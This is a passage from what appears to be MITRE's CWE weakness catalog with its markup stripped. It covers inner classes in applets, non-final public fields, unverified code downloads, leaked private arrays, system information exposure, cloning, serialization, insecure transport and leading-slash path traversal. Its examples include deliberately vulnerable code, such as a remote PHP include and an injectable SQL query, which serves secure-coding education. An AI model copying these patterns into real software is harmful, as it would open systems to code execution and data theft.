public class UrlToolApplet extends Applet { - - - // private member variables for applet components - private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton; - - // init method that adds components to applet - - - // and creates button listener object - public void init() {setLayout(new FlowLayout());enterUrlLabel = new Label("Enter URL: ");enterUrlTextField = new TextField("", 20);submitButton = new Button("Submit");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);ActionListener submitButtonListener = new SubmitButtonListener();submitButton.addActionListener(submitButtonListener);} - - // button listener inner class for UrlToolApplet class - private class SubmitButtonListener implements ActionListener { - public void actionPerformed(ActionEvent evt) { - if (evt.getSource() == submitButton) {String urlString = enterUrlTextField.getText();URL url = null;try {url = new URL(urlString);} catch (MalformedURLException e) {System.err.println("Malformed URL: " + urlString);}if (url != null) {getAppletContext().showDocument(url);}} - } - } - } - - As with the previous examples a solution to this problem would be to use a static inner class, a local inner class or an anonymous inner class. An alternative solution would be to have the applet implement the action listener rather than using it as an inner class as shown in the following example. - - public class UrlToolApplet extends Applet implements ActionListener { - - - // private member variables for applet components - private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton; - - // init method that adds components to applet - public void init() {setLayout(new FlowLayout());enterUrlLabel = new Label("Enter URL: ");enterUrlTextField = new TextField("", 20);submitButton = new Button("Submit");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);submitButton.addActionListener(this);} - - // implementation of actionPerformed method of ActionListener interface - public void actionPerformed(ActionEvent evt) { - if (evt.getSource() == submitButton) {String urlString = enterUrlTextField.getText();URL url = null;try {url = new URL(urlString);} catch (MalformedURLException e) {System.err.println("Malformed URL: " + urlString);}if (url != null) {getAppletContext().showDocument(url);}} - } - } - - - - - - Mobile Code: Use of Inner Class - - - Publicizing of private data when using inner classes - - - OBJ08-J - Do not expose private members of an outer class from within a nested class - - - - - - - Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, References, Relationships - - Mobile Code: Use of Inner Class - - - - The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values. - If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field. - - - - - - - - - Mobile code, such as a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running. - Final provides security by only allowing non-mutable objects to be changed after being set. However, only objects which are not extended can be made final. - - - - Implementation - - - High - - - Integrity - Modify Application Data - The object could potentially be tampered with. - - - Confidentiality - Read Application Data - The object could potentially allow the object to be read. - - - - - Implementation - Declare all public fields as final when possible, especially if it is used to maintain internal state of an Applet or of classes used by an Applet. If a field must be public, then perform all appropriate sanity checks before accessing the field from your code. - - - - - Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor. - - public final class WidgetData extends Applet {public float price;...public WidgetData(...) {this.price = LookupPrice("MyWidgetType");}} - - The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData. - - - Assume the following code is intended to provide the location of a configuration file that controls execution of the application. - - public string configPath = "/etc/application/config.dat"; - - - public String configPath = new String("/etc/application/config.dat"); - - While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function. - - - - - Mobile Code: Non-Final Public Field - - - Failure to provide confidentiality for stored data - - - OBJ10-J - Do not use public static nonfinal variables - - - SFP28 - Unexpected access points - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Background_Details, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Background_Details, Demonstrative_Examples, Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Mobile Code: Non-final Public Field - - - - The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code. - An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit. - - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Medium - - - Integrity - Availability - Confidentiality - Other - Execute Unauthorized Code or Commands - Alter Execution Logic - Other - Executing untrusted code could compromise the control flow of the program. The untrusted code could execute attacker-controlled commands, read or modify sensitive resources, or prevent the software from functioning correctly for legitimate users. - - - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is typically required to find the behavior that triggers the download of code, and to determine whether integrity-checking methods are in use. - - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Black Box - - Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process and also sniff the network connection. Trigger features related to product updates or plugin installation, which is likely to force a code download. Monitor when files are downloaded and separately executed, or if they are otherwise read back into the process. Look for evidence of cryptographic library calls that use integrity checking. - - - - - - Implementation - Perform proper forward and reverse DNS lookups to detect DNS spoofing. - This is only a partial solution since it will not prevent your code from being modified on the hosting site or in transit. - - - Architecture and Design - Operation - - Encrypt the code with a reliable encryption scheme before transmitting. - This will only be a partial solution, since it will not detect DNS spoofing and it will not prevent your code from being modified on the hosting site. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Speficially, it may be helpful to use tools or frameworks to perform integrity checking on the transmitted code. - - - When providing the code that is to be downloaded, such as for automatic updates of the software, then use cryptographic signatures for the code and modify the download clients to verify the signatures. Ensure that the implementation does not contain CWE-295, CWE-320, CWE-347, and related weaknesses. - Use code signing technologies such as Authenticode. See references [REF-454] [REF-455] [REF-456]. - - - - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - - - This example loads an external class from a local subdirectory. - - URL[] classURLs= new URL[]{new URL("file:subdir/")};URLClassLoader loader = new URLClassLoader(classURLs);Class loadedClass = Class.forName("loadMe", true, loader); - - This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum. An attacker may be able to modify the class file to execute malicious code. - - - This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application. - - - //assume the password is already encrypted, avoiding CWE-312 - - function authenticate($username,$password){ - include("http://external.example.com/dbInfo.php"); - - //dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available - mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');mysql_select_db($dbname);$query = 'Select * from users where username='.$username.' And password='.$password;$result = mysql_query($query); - if(mysql_numrows($result) == 1){mysql_close();return true;}else{mysql_close();return false;} - } - - This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow themself to access the application without a real user account. - This example is also vulnerable to an Adversary-in-the-Middle AITM (CWE-300) attack. - - - - - CVE-2019-9534 - Satellite phone does not validate its firmware image. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9534 - - - CVE-2021-22909 - Chain: router's firmware update procedure uses curl with "-k" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909 - - - CVE-2008-3438 - OS does not verify authenticity of its own updates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3438 - - - CVE-2008-3324 - online poker client does not verify authenticity of its own updates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3324 - - - CVE-2001-1125 - anti-virus product does not verify automatic updates for itself. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1125 - - - CVE-2002-0671 - VOIP phone downloads applications from web sites without verifying integrity. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0671 - - - - - Invoking untrusted mobile code - - - SEC06-J - Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar - - - SFP27 - Tainted input to environment - - - - - - - - - - - - - - - - - - - - - - - This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Description, Name, Other_Notes, Potential_Mitigations, References, Relationships, Research_Gaps, Type - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Observed_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, References, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated References, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples - - Mobile Code: Invoking Untrusted Mobile Code - Download of Untrusted Mobile Code Without Integrity Check - - - - The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways. - - - - - - - - - - - - Implementation - - - - - Integrity - Modify Application Data - The contents of the data structure can be modified from outside the intended scope. - - - - - Implementation - Declare the method private. - - - Implementation - Clone the member data and keep an unmodified version of the data private to the object. - - - Implementation - Use public setter methods that govern how a private member can be modified. - - - - - Here, a public method in a Java class returns a reference to a private array. Given that arrays in Java are mutable, any modifications made to the returned reference would be reflected in the original private array. - - private String[] colors;public String[] getColors() {return colors;} - - - - In this example, the Color class defines functions that return non-const references to private members (an array type and an integer type), which are then arbitrarily altered from outside the control of the class. - - class Color{private:int[2] colorArray;int colorValue;public:Color () : colorArray { 1, 2 }, colorValue (3) { };int[2] & fa () { return colorArray; } // return reference to private arrayint & fv () { return colorValue; } // return reference to private integer};int main (){Color c;c.fa () [1] = 42; // modifies private array elementc.fv () = 42; // modifies private intreturn 0;} - - - - - - Private Array-Typed Field Returned From A Public Method - - - SFP23 - Exposed Data - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Private Array-Typed Field Returned From A Public Method - - - - Assigning public data to a private array is equivalent to giving public access to the array. - - - - - - - - - - - - Implementation - - - - - Integrity - Modify Application Data - The contents of the array can be modified from outside the intended scope. - - - - - Implementation - Do not allow objects to modify private members of a class. - - - - - In the example below, the setRoles() method assigns a publically-controllable array to a private field, thus allowing the caller to modify the private array directly by virtue of the fact that arrays in Java are mutable. - - private String[] userRoles;public void setUserRoles(String[] userRoles) {this.userRoles = userRoles;} - - - - - - Public Data Assigned to Private Array-Typed Field - - - SFP25 - Tainted input to variable - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The application does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the application does. - Network-based software, such as web applications, often runs on top of an operating system or similar environment. When the application communicates with outside parties, details about the underlying system are expected to remain hidden, such as path names for data files, other OS users, installed packages, the application environment, etc. This system information may be provided by the application itself, or buried within diagnostic or debugging messages. Debugging information helps an adversary learn about the system and form an attack plan. - An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. Using other weaknesses, an attacker could cause errors to occur; the response to these errors can reveal detailed system information, along with other impacts. An attacker can use messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. An application may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism. - - - - - - - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - Implementation - Production applications should never use methods that generate internal details such as stack traces and error messages unless that information is directly committed to a log that is not viewable by the end user. All error message text should be HTML entity encoded before being written to the log file to protect against potential cross-site scripting attacks against the viewer of the logs - - - - - The following code prints the path environment variable to the standard error stream: - - char* path = getenv("PATH");...sprintf(stderr, "cannot find exe on path %s\n", path); - - - - This code prints all of the running processes belonging to the current user. - - - - //assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78) - $userName = getCurrentUser();$command = 'ps aux | grep ' . $userName;system($command); - - If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users. - - - The following code prints an exception to the standard error stream: - - try {...} catch (Exception e) {e.printStackTrace();} - - - try {...} catch (Exception e) {Console.Writeline(e);} - - Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program. - - - The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console. - - string cs="database=northwind; server=mySQLServer...";SqlConnection conn=new SqlConnection(cs);...Console.Writeline(cs); - - Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system is vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program. - - - - - System Information Leak - - - ERR01-J - Do not allow exceptions to expose sensitive information - - - SFP23 - Exposed Data - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, References, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - System Information Leak - Information Leak of System Data - Exposure of System Data to an Unauthorized Control Sphere - - - - The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class. - Cloneable classes are effectively open classes, since data cannot be hidden in them. Classes that do not explicitly deny cloning can be cloned by any other class without running the constructor. - - - - - - - - - - - - Implementation - - - Medium - - - Access Control - Bypass Protection Mechanism - A class that can be cloned can be produced without executing the constructor. This is dangerous since the constructor may perform security-related checks. By allowing the object to be cloned, those checks may be bypassed. - - - - - Implementation - If you do make your classes clonable, ensure that your clone method is final and throw super.clone(). - - - - - The following example demonstrates the weakness. - - public class CloneClient { - public CloneClient() //throwsjava.lang.CloneNotSupportedException { - - Teacher t1 = new Teacher("guddu","22,nagar road");//...// Do some stuff to remove the teacher.Teacher t2 = (Teacher)t1.clone();System.out.println(t2.name); - }public static void main(String args[]) { - - new CloneClient(); - } - }class Teacher implements Cloneable { - - public Object clone() { - - try {return super.clone();}catch (java.lang.CloneNotSupportedException e) { - - throw new RuntimeException(e.toString()); - } - }public String name;public String clas;public Teacher(String name,String clas) { - - this.name = name;this.clas = clas; - } - } - - Make classes uncloneable by defining a clone function like: - - public final void clone() throws java.lang.CloneNotSupportedException {throw new java.lang.CloneNotSupportedException();} - - - - - - Information leak through class cloning - - - OBJ07-J - Sensitive classes must not let themselves be copied - - - SFP23 - Exposed Data - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Information Leak through Class Cloning - - - - The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class. - Serializable classes are effectively open classes since data cannot be hidden in them. Classes that do not explicitly deny serialization can be serialized by any other class, which can then in turn use the data stored inside it. - - - - - - - - - - Implementation - - - High - - - Confidentiality - Read Application Data - an attacker can write out the class to a byte stream, then extract the important data from it. - - - - - Implementation - In Java, explicitly define final writeObject() to prevent serialization. This is the recommended solution. Define the writeObject() function to throw an exception explicitly denying serialization. - - - Implementation - Make sure to prevent serialization of your objects. - - - - - This code creates a new record for a medical patient: - - class PatientRecord {private String name;private String socialSecurityNum;public Patient(String name,String ssn) {this.SetName(name);this.SetSocialSecurityNumber(ssn);}} - - This object does not explicitly deny serialization, allowing an attacker to serialize an instance of this object and gain a patient's name and Social Security number even though those fields are private. - - - - - Information leak through serialization - - - SER03-J - Do not serialize unencrypted, sensitive data - - - SER05-J - Do not serialize instances of inner classes - - - SFP23 - Exposed Data - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Information Leak through Serialization - - - - Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted. - - - - - - - - - Implementation - - - Operation - - - - - Confidentiality - Read Application Data - - - Integrity - Modify Application Data - - - - - System Configuration - The application configuration should ensure that SSL or an encryption mechanism of equivalent strength and vetted reputation is used for all access-controlled pages. - - - - - J2EE Misconfiguration: Insecure Transport - - - - - - - - If an application uses SSL to guarantee confidential communication with client browsers, the application configuration should make it impossible to view any access controlled page without SSL. There are three common ways for SSL to be bypassed: - - - A user manually enters URL and types "HTTP" rather than "HTTPS". - Attackers intentionally send a user to an insecure URL. - A programmer erroneously creates a relative link to a page in the application, which does not switch from HTTP to HTTPS. (This is particularly easy to do when the link moves between public and secured areas on a web site.) - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - J2EE Misconfiguration: Insecure Transport - - - - A software system that accepts path input in the form of multiple leading slash ('//multiple/leading/slash') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - CVE-2002-1483 - Read files with full pathname using multiple internal slash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483 - - - CVE-1999-1456 - Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456 - - - CVE-2004-0578 - Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578 - - - CVE-2002-0275 - Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275 - - - CVE-2004-1032 - Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032 - - - CVE-2002-1238 - Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238 - - - CVE-2004-1878 - Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878 - - - CVE-2005-1365 - Server allows remote attackers to execute arbitrary commands via a URL with multiple leading "/" (slash) characters and ".." sequences. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365 - - - CVE-2000-1050 - Access directory using multiple leading slash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050 - - - CVE-2001-1072 - Bypass access restrictions via multiple leading slash, which causes a regular expression to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072 - - - CVE-2004-0235 - Archive extracts to arbitrary files using multiple leading slash in filenames in the archive. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235 - - - - - //multiple/leading/slash ('multiple leading slash') - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - 